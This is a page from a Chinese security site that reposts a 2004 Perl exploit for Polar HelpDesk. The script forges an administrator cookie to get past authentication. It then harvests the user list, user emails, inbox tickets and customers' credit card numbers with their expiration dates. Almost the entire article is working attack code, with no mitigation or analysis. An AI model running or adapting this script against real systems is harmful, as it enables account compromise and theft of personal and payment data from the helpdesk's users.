首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Polar HelpDesk Remote Exploit
来源:vfocus.net 作者:vfocus 发布时间:2004-07-23  

Polar HelpDesk Remote Exploit

#!/usr/bin/perl
#
# Beyond Security Ltd.
# The below sample will do:
# 1) Grab a user list
# 2) Grab each user's email
# 3) List all available Inbox tickets
# 4) List all tickets with charge on them, and the credit card number and
their expiration date

use IO::Socket;
use strict;

my $host = $ARGV[0];
my $base_path = $ARGV[1];

my $remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "80"
);

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

my $content = "txtPassword=admin&txtEmail=admin\@admin&Submit=Log+in";

my $length = length($content);

my $base_path = $ARGV[1];

print "Get user list\n";

my $data_get_userlist = "GET /$base_path/user/modifyprofiles.asp
HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

print $remote $data_get_userlist;
# print $data_get_userlist;

sleep(1);

my @names;
while (<$remote>)
{
if (/<td>Results /)
{
while (/<a href="profileinfo.asp\?ID=([0-9]+)">([^<]+)<\/a>/g)
{
my $Item;
$Item->{ID} = $1;
$Item->{Name} = $2;
print "ID: ".$Item->{ID}." Name: ".$Item->{Name}."\n";
push @names, $Item;
}
}
}
close $remote;

print "Get users' email\n";

my $data_get_userdata = "";
foreach my $name (@names)
{
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

$data_get_userdata = "GET
/$base_path/user/profileinfo.asp?ID=".$name->{ID}." HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

print $remote $data_get_userdata;
# print $data_get_userdata;

sleep(1);

while (<$remote>)
{
if (/name="txtEmail" value="/)
{
/name="txtEmail" value="([^"]+)"/;
print "ID: ".$name->{ID}.", Email: $1\n";
}
}
close($remote);
}

print "Get Inbox tickets\n";

my $data_get_inboxtickets = "GET
/$base_path/ticketsupport/Tickets.asp?ID=4 HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print $remote $data_get_inboxtickets;
#print $data_get_inboxtickets;

sleep(1);

while (<$remote>)
{
if (/Ticket #/)
{
# print $_;
while (/<a
href="tickets.asp\?ID=4&Personal=&TicketID=([0-9]+)[^>]+>([^<]+)<\/a>/g)
{
print "Ticket ID: $1, Name: $2\n";
}
}
}

close($remote);

print "Get billing information\n";

my $data_get_billing = "GET /$base_path/billing/billingmanager_income.asp
HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print $remote $data_get_billing;
sleep(1);

my @tickets;

while (<$remote>)
{
if (/Ticket No./)
{
my $Item;
/<a href="..\/ticketsupport\/ticketinfo.asp\?ID=([0-9]+)">([^<]+)<\/a>/;
$Item->{ID} = $1;
$Item->{Name} = $2;
print "Ticket ID: ".$Item->{ID}.", Name: ".$Item->{Name}."\n";
push @tickets, $Item;
}
}

close($remote);

foreach my $ticket (@tickets)
{
my $data_get_billingcreditcard = "GET
/$base_path/billing/billingmanager_ticketinfo.asp?ID=".$ticket->{ID}."
HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405
Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print $remote $data_get_billingcreditcard;
sleep(1);

my $Count = 0;
my $Print = 0;
while (<$remote>)
{
if ($Print)
{
$Count ++;
if ($Count > 1)
{
/<td[^>]+>([^<]+)<\/td>/;
print $1, "\n";
$Print = 0;
}
}
if (/Expiration date<br>/)
{
print "Expiration date: ";
$Count = 0;
$Print = 1;
}
if (/Credit Card<br>/)
{
print "Credit Card: ";
$Count = 0;
$Print = 1;
}
}
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Software Sciences's S
·NetSupport DNA HelpDesk SQL In
·LBE Web HelpDesk SQL Injection
·Mensajeitor Exploit
·Multiple Serena TeamTrack Expl
·Denial of Service in Microsoft
·Drcatd Multiple Buffer Overflo
·ms04-022 exp for xp sp1
·Samba SWAT Authorization Buffe
·Lexmark Network Printers Built
·Apache httpd Arbitrary Long HT
·JSP的WEBSHELL
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved